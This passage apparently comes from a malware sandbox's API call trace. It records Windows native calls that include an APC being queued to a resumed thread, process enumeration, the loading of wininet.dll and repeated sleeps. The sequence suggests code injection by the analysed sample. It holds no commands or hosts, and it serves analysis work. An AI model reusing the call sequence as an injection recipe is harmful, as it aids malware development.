[337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0289.784] NtQueueApcThread (ThreadHandle=0x12c, ApcRoutine=0x7d1c8f2, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0289.793] NtResumeThread (in: ThreadHandle=0x12c, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0289.793] NtClose (Handle=0x128) returned 0x0 [0289.793] NtClose (Handle=0x12c) returned 0x0 [0289.802] PostThreadMessageW (idThread=0x67c, Msg=0x111, wParam=0x0, lParam=0x0) returned 0 [0289.802] PostThreadMessageW (idThread=0x67c, Msg=0x8003, wParam=0xde6d6, lParam=0x0) returned 0 [0289.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0xb40000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0289.803] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0294.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0xb40000, RegionSize=0xdea68*=0x10000) returned 0x0 [0294.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0xb40000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0xb40000, ResultLength=0x0) returned 0xc0000004 [0294.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0xb40000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0294.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0xb40000, RegionSize=0xdea54*=0x20000) returned 0x0 [0294.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0xb40000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0xb40000, ResultLength=0x0) returned 0x0 [0294.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0xb40000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0294.866] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) Thread: id = 368 os_tid = 0xd54 Thread: id = 369 os_tid = 0xd58 [0284.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x600ff58*=0x0, ZeroBits=0x0, RegionSize=0x600ff5c*=0x2cc4c, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x600ff58*=0x6010000, RegionSize=0x600ff5c*=0x2d000) returned 0x0 [0284.551] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="wininet.dll", BaseAddress=0x600ff44 | out: BaseAddress=0x600ff44*=0x71d60000) returned 0x0 [0284.595] Sleep (dwMilliseconds=0x7d0) [0286.595] Sleep (dwMilliseconds=0x7d0) [0288.602] Sleep (dwMilliseconds=0x7d0) [0290.787] Sleep (dwMilliseconds=0x7d0) [0292.794] Sleep (dwMilliseconds=0x7d0) [0294.795] Sleep (dwMilliseconds=0x7d0) [0297.227] Sleep (dwMilliseconds=0x7d0)